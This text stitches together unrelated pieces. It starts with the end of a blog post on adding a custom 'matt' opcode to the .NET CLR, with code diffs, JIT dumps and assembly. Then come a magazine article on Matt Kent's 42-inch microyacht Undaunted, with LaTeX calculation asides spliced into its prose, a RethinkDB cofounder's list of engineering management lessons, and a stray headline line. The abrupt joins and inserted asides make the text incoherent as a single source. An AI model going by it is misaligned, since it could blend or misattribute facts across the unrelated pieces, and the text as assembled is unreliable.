       C3                   ret

I’m not entirely sure why there is a nop instruction in there? But it works, which is the main thing!!


Step 4

In the CLR you can also dynamically emit code at runtime using the methods that sit under the ‘System.Reflection.Emit’ namespace, so the last task is to add the OpCodes.Matt field and have it emit the correct values for the matt op-code.

--- a/src/mscorlib/src/System/Reflection/Emit/OpCodes.cs
+++ b/src/mscorlib/src/System/Reflection/Emit/OpCodes.cs
@@ -139,6 +139,7 @@ internal enum OpCodeValues
         Castclass = 0x74,
         Isinst = 0x75,
         Conv_R_Un = 0x76,
+        Matt = 0x77,
         Unbox = 0x79,
         Throw = 0x7a,
         Ldfld = 0x7b,
@@ -1450,6 +1451,16 @@ private OpCodes()
             (0 << OpCode.StackChangeShift)
         );
+        public static readonly OpCode Matt = new OpCode(OpCodeValues.Matt,
+            ((int)OperandType.InlineNone) |
+            ((int)FlowControl.Next << OpCode.FlowControlShift) |
+            ((int)OpCodeType.Primitive << OpCode.OpCodeTypeShift) |
+            ((int)StackBehaviour.Pop1_pop1 << OpCode.StackBehaviourPopShift) |
+            ((int)StackBehaviour.Push1 << OpCode.StackBehaviourPushShift) |
+            (1 << OpCode.SizeShift) |
+            (-1 << OpCode.StackChangeShift)
+        );
+
         public static readonly OpCode Unbox = new OpCode(OpCodeValues.Unbox,
             ((int)OperandType.InlineType) |
             ((int)FlowControl.Next << OpCode.FlowControlShift) |

This lets us write the code shown below, which emits, compiles and then executes the matt op-code:

DynamicMethod method = new DynamicMethod(
    "TestMattOpCode",
    returnType: typeof(int),
    parameterTypes: new[] { typeof(int), typeof(int) },
    m: typeof(TestClass).Module);

// Emit the IL
var generator = method.GetILGenerator();
generator.Emit(OpCodes.Ldarg_0);
generator.Emit(OpCodes.Ldarg_1);
generator.Emit(OpCodes.Matt); // Use the new 'matt' IL OpCode
generator.Emit(OpCodes.Ret);

// Compile the IL into a delegate (uses the JITter under-the-hood)
var mattOpCodeInvoker = (Func<int, int, int>)method.CreateDelegate(typeof(Func<int, int, int>));

// prints "1 m@ 7 = 7"
Console.WriteLine("{0} m@ {1} = {2} (via IL Emit)", 1, 7, mattOpCodeInvoker(1, 7));
// prints "12 m@ 9 = 12"
Console.WriteLine("{0} m@ {1} = {2} (via IL Emit)", 12, 9, mattOpCodeInvoker(12, 9));

Step 5

Finally, you may have noticed that I cheated a little bit in Step 3 when I made changes to the JIT. Even though what I did works, it is not the most efficient way, due to the extra method call to CORINFO_HELP_MATT. Also, the JIT generally doesn’t use helper functions in this way, instead preferring to emit assembly code directly.

As a future exercise for anyone who has read this far (any takers?), it would be nice if the JIT emitted more efficient code. For instance if you write C# code like this (which does the same thing as the matt op-code):

private static int MaxMethod(int x, int y)
{
    return x > y ? x : y;
}

It’s turned into the following IL by the C# compiler

IL to import:
IL_0000  02                ldarg.0     
IL_0001  03                ldarg.1     
IL_0002  30 02             bgt.s        2 (IL_0006)
IL_0004  03                ldarg.1     
IL_0005  2a                ret         
IL_0006  02                ldarg.0     
IL_0007  2a                ret         

Then when the JIT runs it’s processed as 3 basic-blocks (BB01, BB02 and BB03):

Importing BB01 (PC=000) of 'TestNamespace.TestClass:MaxMethod(int,int):int'
    [ 0]   0 (0x000) ldarg.0
    [ 1]   1 (0x001) ldarg.1
    [ 2]   2 (0x002) bgt.s
           [000005] ------------             ▌  stmtExpr  void  (IL 0x000...  ???)
           [000004] ------------             └──▌  jmpTrue   void  
           [000002] ------------                │  ┌──▌  lclVar    int    V01 arg1         
           [000003] ------------                └──▌  >         int   
           [000001] ------------                   └──▌  lclVar    int    V00 arg0         

Importing BB03 (PC=006) of 'TestNamespace.TestClass:MaxMethod(int,int):int'
    [ 0]   6 (0x006) ldarg.0
    [ 1]   7 (0x007) ret
           [000009] ------------             ▌  stmtExpr  void  (IL 0x006...  ???)
           [000008] ------------             └──▌  return    int   
           [000007] ------------                └──▌  lclVar    int    V00 arg0         

Importing BB02 (PC=004) of 'TestNamespace.TestClass:MaxMethod(int,int):int'
    [ 0]   4 (0x004) ldarg.1
    [ 1]   5 (0x005) ret
           [000013] ------------             ▌  stmtExpr  void  (IL 0x004...  ???)
           [000012] ------------             └──▌  return    int   
           [000011] ------------                └──▌  lclVar    int    V01 arg1         

Before finally being turned into the following assembly code, which is way more efficient: it contains just a cmp, a jg and a couple of mov instructions, but crucially it’s all done in-line, with no need to call out to another method.

// Assembly listing for method TestNamespace.TestClass:MaxMethod(int,int):int
// Emitting BLENDED_CODE for X64 CPU with AVX
// optimized code
// rsp based frame
// partially interruptible
// Final local variable assignments
//
//   V00 arg0         [V00,T00] (  4,  3.50)     int  ->  rcx
//   V01 arg1         [V01,T01] (  4,  3.50)     int  ->  rdx
// # V02 OutArgs      [V02    ] (  1,  1   )  lclBlk ( 0) [rsp+0x00]
//
// Lcl frame size = 0

G_M32709_IG01:
G_M32709_IG02:
       3BCA                 cmp      ecx, edx
       7F03                 jg       SHORT G_M32709_IG04
       8BC2                 mov      eax, edx
G_M32709_IG03:
       C3                   ret
G_M32709_IG04:
       8BC1                 mov      eax, ecx
G_M32709_IG05:
       C3                   ret

Disclaimer/Credit

I got the idea for doing this from the appendix of the excellent book Shared Source CLI Essentials (Amazon); you can also download a copy of the 2nd edition if you don’t want to purchase the print one.

In Appendix B the authors of the book reproduced the work that Peter Drayton did to add an Exponentiation op-code to the SSCLI, which inspired this entire post, so thanks for that!!

Appendix B - Add a new CIL opcode

42-inch yacht still hoping to become the smallest boat to cross the Atlantic


Matt Kent, age 33, turned back just 24 hours into his first attempt to sail across the Atlantic aboard the "stern-faced" tub Undaunted. Ryan Langley takes a close-up look at this tiny little ocean-crossing capsule.

Just 24 hours into his first attempt to sail solo across the Atlantic in Undaunted, his 42-inch yacht, Matt Kent had to turn back.

He set off from La Gomera in the Canary Islands on 6 April, but returned after concerns about his boat’s seaworthiness.

He explains: “I wasn’t really in too much danger, [but] there was a weak point in the boat that was concerning me. The emergency flotation system component that was on the rudder assembly was getting hammered so hard in these really close together waves. The float was getting jammed upwards so fast and so often the boat’s movement couldn’t keep up.

“It was the worst, most unpredictable and erratic conditions I have ever sailed in with that boat. When it started gusting 45 knots I decided that I shouldn’t keep going with such an obvious weak link.”

Kent estimated his crossing time at some three months, so Undaunted cannot be fixed in time to avoid the hurricane season this year. He therefore plans to postpone his next attempt until the autumn.

He still hopes to set a record for the smallest boat ever to cross the Atlantic. “Both of the guys that held this record had to wait months or even years as setbacks took their toll.”

Where it all began for Undaunted

Skipper Matt Kent was working on a 200ft tall ship when he pondered what the smallest boat ever to sail around the world had been. On discovering that a 5ft 4in yacht had crossed the Atlantic, a seed was sown which resulted in the custom-designed Undaunted.

In 1965 Robert Manry sailed his 13ft 6in Tinkerbelle from Massachusetts to England (see video clip below), and the modern ‘microyacht’ trend was born. Tinkerbelle was followed by the 12ft Nonoalca and 8ft Bathtub across the Atlantic.

By 1968 Hugo Vihlen had made the smallest ocean crossing yet, sailing his 6ft April Fool from Casablanca to Miami. Vihlen went on to cross the Atlantic in his 5ft 4in Father’s Day, while in 2002, Tom McNally attempted, but failed, to cross the Atlantic in the absurdly tiny 3ft 11in Vera Hugh II.

Now Matt Kent, a 33-year-old professional tall ship sailor originally from Oregon, is preparing to cross the Atlantic Ocean aboard his three-and-a-half foot aluminium microyacht Undaunted. He expects the 4,700 nautical mile voyage to Florida to take four months.

“Undaunted is 42in long and 42in wide with a 5ft draught, 700lb lead ballast and a 40-gallon emergency water tank slung off the bottom of the keel,” explains Kent.

“Undaunted is designed to pitch rather than roll. That is counter to most boat designs. With better roll stability it will slip off the wind less as it leans forward. If it was more inclined to roll it would move forward and spill the wind from side to side, and be less efficient with more movement.

“Large twin rudders for low-speed efficiency and redundancy also help straighten the boat’s movement, along with a full keel.”

A test sail on Lake Erie demonstrated the unique handling of the boat Kent calls ‘a grumpy little man’.

“He sails downwind like a champ, self-tending downwind by sail angle alone due to the high mast being all the way forward. With a hull speed of just 2.5 knots he is not quick but he is stable and his square dimensions mean he is affected by waves from any angle the same.

“He just bobs up and down. With a balance point about 16in above the keel and a 5ft draught he has a stability profile most designers would kill for.

Undaunted is a terrible boat, but he is a great storm shelter. A sailing capsule ready for the worst and also able to do the easy part, sailing in a straight line.

“We couldn’t make it go any faster, we couldn’t make it longer for the record. So we focused on safety and stability and through that our stern-faced grumpy little man was born.”

The emergency flotation system can be inflated three times using onboard CO2 canisters, or hand-inflated. Kent has calculated that one tube can support the entire boat, while three can lift the hatch out of the sea even with the boat full of water.

Capsule living

“Sailing it is quite simple, living on it is harder,” Kent comments. He cannot lie fully flat on board. “The boat is designed around my dimensions.

“We have enough space for me to sit upright, and lay my neck and spine out to decompress on the diagonal. The hatch I stand up in is just above my hip bones to prevent me from getting flipped out of the boat, though I will have a harness and tether on all the time.”

The boat is painted white to reflect heat and fully insulated above the waterline, Kent explains. “Below the waterline was left bare so the conductive nature of the aluminium hull will create a cold pocket for me to be in. For ventilation my dorade is at the top of the mast along with my running lights, AIS antenna, and radar reflector.

“However, if I have to keep the hatch shut, I have a neoprene mask with two one-way valves in it. One breathes in from the cabin down the mast and the other breathes out into a flexible hose attached to the inner tube going back out of the mast.”

Provisions are stowed under Kent’s feet. “I have enough food – half freeze-dried – for six months at 1,500 calories a day. I have intentionally put on 20 extra pounds for the trip as well.

“My diet consists of nuts, dried fruit, protein powder, nutrition bars, a variety of soups, stews, pasta, peanut butter, Nutella and so on. I have a huge variety as well as 64,000 extra calories in the form of two gallons of olive oil to add to my food.

“None of my food needs cooking but I do have a 12V/120W heat coil wand to heat water for dinner or tea or coffee, if I can afford the power. With a two-minute boil time I should be able to use it often. All of this fits in the bilge and down the keel.”
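
Those provisioning figures roughly hang together on a back-of-the-envelope check (the ~8,000 kcal per litre energy density for olive oil and the use of US gallons are assumptions, not figures from Kent):

\[ 180\ \text{days} \times 1{,}500\ \tfrac{\text{kcal}}{\text{day}} = 270{,}000\ \text{kcal}; \qquad 2\ \text{US gal} \approx 7.6\ \text{L}, \quad 7.6 \times 8{,}000 \approx 61{,}000\ \text{kcal} \]

The second figure is in the same ballpark as the 64,000 extra calories Kent quotes for the olive oil.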

Rather than carry a liferaft, Undaunted has its own emergency flotation system. “I had a white-water raft company make three inflatable tubes that will be rolled up and attached to the port, starboard, and bow of my boat. If I get swamped, holed or have an emergency I can turn a valve from inside the boat to have CO2 fill the tubes and float the boat until I fix it, or pump out,” explains Kent.

Undaunted has no engine, so the watermaker and battery charger will be operated by hand and foot pumps.

“I have two 1.2-gallon manual reverse-osmosis desalinators. One would be more than enough, but water is nothing to mess with.

“I will also have one month’s worth of water on board and one month of food that doesn’t need to be rehydrated if the watermakers fail or if I am injured and can’t pump. Making water and electricity will be part of my daily exercise.

“Also I will be able to swim behind the boat with a dual tether and harness system.”

The keel fresh water tank is divided into four ten-gallon compartments to avoid loss of stability in the event that Kent uses the water. Each can then be separately refilled with seawater.
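
If that 40-gallon keel tank is the month’s reserve Kent mentions, the implied ration is easy to gauge (US gallons assumed):

\[ 40\ \text{US gal} \approx 151\ \text{L}; \qquad \tfrac{151\ \text{L}}{30\ \text{days}} \approx 5\ \tfrac{\text{L}}{\text{day}} \]

That is a lean but workable allowance for drinking and rehydrating food.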

Permission to land

When Vihlen crossed the Atlantic in 1993 in his 5ft 4in Father’s Day, his original plans were thwarted by the US Coast Guard and he eventually departed from Canada. Kent says this was one of the drivers in choosing a west-about route.

“Not only is the thought of coming home better than showing up someplace else after a long voyage alone, but it means that by the time I am in US waters I will have just crossed 4,600 miles of open ocean.

“If I can, I will pull into port, raise my Q flag and wait for Customs there. If I am near shore and I become too much of a traffic hazard, we will have a small boat come retrieve me.

“We are trying to make sure we don’t get in the way of other people’s livelihood or put anyone at risk with a needless rescue operation.”

His safety equipment includes AIS and an EPIRB.

“I have a satellite phone and a shore support team watching weather and my progress, giving me daily weather reports and receiving my location and status updates directly. I will also be tracked by my AIS system.

“I have a standalone GPS, GPS on my radio, GPS on my sat phone and on my smartphone and chartplotter, as well as redundant clocks and a sextant, and paper charts of the Caribbean and mid-North Atlantic.”

Kent says he is unconcerned about the psychological challenge of living in such a small space for four months.

“I have spent weeks alone in the Guatemalan Highlands, and lived alone in the woods for years. I have never been so alone or for so long, but few have.

“With plenty of digital media, books, daily check-ins and phone calls on the sat phone I will hardly be alone. Meditation has been a big part of my life, so the loneliness of the trip is not my biggest concern.”

Specifications

Length: 1.07m (42in)
Draught: 1.52m (60in)
Weight: 544kg unladen (1,200lb), or 816kg laden (1,800lb)
Hull speed: 2.5 knots
Sail area: 49.5sq ft (square sail) plus 27sq ft (raffee)
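
The 2.5-knot hull speed above squares with the standard displacement hull speed rule of thumb; as a rough check (taking the waterline length to be close to the boat’s 3.5ft overall length, an assumption):

\[ v_{\text{hull}} \approx 1.34\,\sqrt{L_{\text{WL}}\,[\text{ft}]}\ \text{knots} = 1.34 \times \sqrt{3.5} \approx 2.5\ \text{knots} \]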

Undaunted has a modified square rig. “I have three identical yards and two sails, one square and one raffee [a triangular topsail] set above a lower yard. One will be inside the cabin while the other is set.”

The boat has two watertight hatches: a small one set into the large one. The large hatch opens and locks over the back of the boat to act as a work table and guard against getting pooped. The small hatch has a lookout dome and is just big enough to allow Kent to get in and out.

Two 16-gallon polyethylene tanks or ‘saddle-bags’ are lashed to either side of the boat under a 4in port. They will hold lighter supplies like clothes and extra line, says Kent. “They are also reserve flotation in the event of flooding.”

The rudders are attached to the transom by two 4in piano hinges. Attached to that rudder assembly is a third tiller that travels through the transom inside a rubber boot to keep it watertight, allowing steering from inside the vessel. There is no autopilot or wind vane self-steering.

Two roll-up solar panels can be deployed or stored down below.

The keel incorporates a 40-gallon water tank.

A large waterproof case houses all electronics, bolted to the port bulkhead. This includes breakers attached to the 105 amp-hour battery in the bilge.

You can learn more about Undaunted and Matt Kent’s Atlantic crossing on his Facebook page Little Boat Project or the website littleboatproject.org

44 engineering management lessons

I am a cofounder of RethinkDB, an open-source distributed database designed to help developers and operations teams work with unstructured data to build real-time applications.

03 Oct 2014

Welcome to engineering management. It’s fun, it’s exhausting, it’s rewarding — but most importantly it’s new! What worked for you before won’t work now. You’ll have to acquire a new set of skills, and shed some bad habits in the process. Here is a short guide to get you started.

Do

  1. Attract, nurture, coach, and retain talent. Talk to engineers to tease out concerns early, then fix them if you can.
  2. Communicate to every engineer the next most important issue for them to work on.
  3. Be the tiebreaker when the development team can’t reach consensus.
  4. Be the information hub. Know what every engineer is working on, and help connect the dots that wouldn’t otherwise get connected.
  5. Provide administrative support. Schedule issues, coordinate releases, and make sure the bureaucratic machine keeps ticking.
  6. Enforce behavioral and performance standards. Fire bullies and underperformers.


Don’t

  1. Personally fix bugs and ship features. You have to write code to remain an effective tiebreaker, but that’s where your coding responsibilities end.
  2. Supervise the quality and volume of people’s work. Software engineering isn’t an assembly line. If you find yourself supervising too often, you haven’t attracted the right people or given them the right incentives.


Motivation and culture

  1. You’re the one who makes hiring and firing decisions. Everything that happens on your team is your responsibility.
  2. Engineering is a seller’s market: people work for you because they believe in you. Access to their talent is a privilege.
  3. Authority isn’t bestowed freely. It’s earned by making good decisions over time.
  4. Don’t make decisions unless you have to. Whenever possible, allow the team to explore ideas and make decisions on its own.
  5. Do make decisions when it’s necessary. Few things are as demoralizing as a stalled team.
  6. Don’t shoot down ideas until it’s necessary. Create an environment where everyone feels safe to share and explore ideas. The folks writing the code have a lot of information you don’t. Rely on your team and you’ll make better decisions.
  7. Building intuition on how to make good decisions and cultivating a great relationship with your team will get you 95% of the way there. The plethora of conceptual frameworks for organizing engineering teams won’t make much difference. They make good managers slightly better and bad managers slightly worse.


Emotions and people

  1. Management happens to be prestigious in our culture, but it’s a skill like any other. Prestige is a distraction — it’s fickle and arbitrary. Guard against believing you’re any better than anyone else. The sooner you get over prestige, the sooner you can focus on doing your job well.
  2. Management also attracts scorn. Ignore it — the people who believe managers are useless don’t understand the dynamics of building a winning human organization.
  3. If you feel something’s wrong, you’re probably right. Don’t let anyone bully you into ignoring your feelings.
  4. If you find yourself blaming someone, you’re probably wrong. Nobody wakes up and tries to do a bad job. 95% of the time you can resolve your feelings by just talking to people.
  5. Most people won’t easily share their emotions. Have frequent informal conversations, and tease out everything that might be wrong. Then fix it if you can.
  6. Your team looks to you for leadership. Have the courage to say what everyone knows to be true but isn’t saying.
  7. You’re paid to discover and fix cultural problems your team may not be aware of. Have the courage to say what everyone should know but doesn’t.
  8. Hire great people, then trust them completely. Evaluate performance on a monthly or quarterly basis, then fire if you have to. Don’t evaluate people daily; it will drive everyone (including you) insane.
  9. Most intellectual arguments have strong emotional undercurrents. You’ll be dramatically more efficient once you learn to figure out what those are.


Tiebreaking and conflict

  1. Don’t judge too quickly; you’re right less often than you think. Even if you’re sure you’re right in any given case, wait until everyone’s opinion is heard.
  2. Once everyone is heard, summarize all points of view so clearly that people say “Thanks, I wish I’d thought of putting it that way.” List any points of agreement with each view, and state what you’ve learned from everyone. Then make your decision.
  3. Once you’ve made your decision, enforce it. Don’t let the team waste time going in circles to placate disproportionately strong voices.
  4. Reopen the discussion if there is significant new information.
  5. When disagreement gets personal or people don’t accept well-reasoned decisions, it turns into conflict.
  6. Most conflict happens because people don’t feel heard. Sit down with each person and ask them how they feel. Listen carefully. Then ask again. And again. Then summarize what they said back to them. Most of the time that will solve the problem.
  7. If the conflict persists after you’ve gone to reasonable lengths to hear everyone out and fix problems, it’s time for a difficult conversation.


Difficult conversations

  1. Have difficult conversations as soon as possible. Waiting will only make a bad situation worse.
  2. Never assume or jump to conclusions. Never demonize people in your mind. Never blame, yell or vilify.
  3. Use non-violent communication; it’s the best method I know of to critique people’s behavior without offending them. It smells like a management fad, but it really works (I promise).
  4. Have the courage to state how you feel and what you need. People are drawn to each other’s vulnerability but repelled by their own. Vulnerability isn’t weakness.
  5. Expect people to extend you the same courtesy. If someone makes you feel bad for stating your needs and feelings, it tells you more about them than about yourself.


Rough edge

  1. People will push and prod to discover your boundaries. Knowing when to stand back and when to stand firm is half the battle.
  2. Occasionally someone will push too far. When they do, you have to show a rough edge or you’ll lose authority with your team.
  3. A firm “I’m not ok with that” is usually enough.
  4. Don’t laugh things off if you don’t feel like laughing them off. Have the courage to show your true emotions.
  5. If you have to firmly say “I’m not ok with that” too many times to the same person, it’s your job to fire them.
  6. Unless you’re a sociopath, firing people is so hard you’ll invent excuses not to do it. If you’re consistently wondering if someone’s a good fit for too long, have the courage to do what you know is right.
  7. Don’t let people pressure you into decisions you don’t believe in. They’ll hold you responsible for them later, and they’ll be right. Decisions are your responsibility.
  8. Believe in yourself. You can’t lead a cavalry charge if you think you look funny on a horse.


Thanks to Michael Glukhovsky, Michael Lucy, and Alex Taussig for reviewing this post.

Ceglowski: Notes from an Emergency (time to regulate tech)
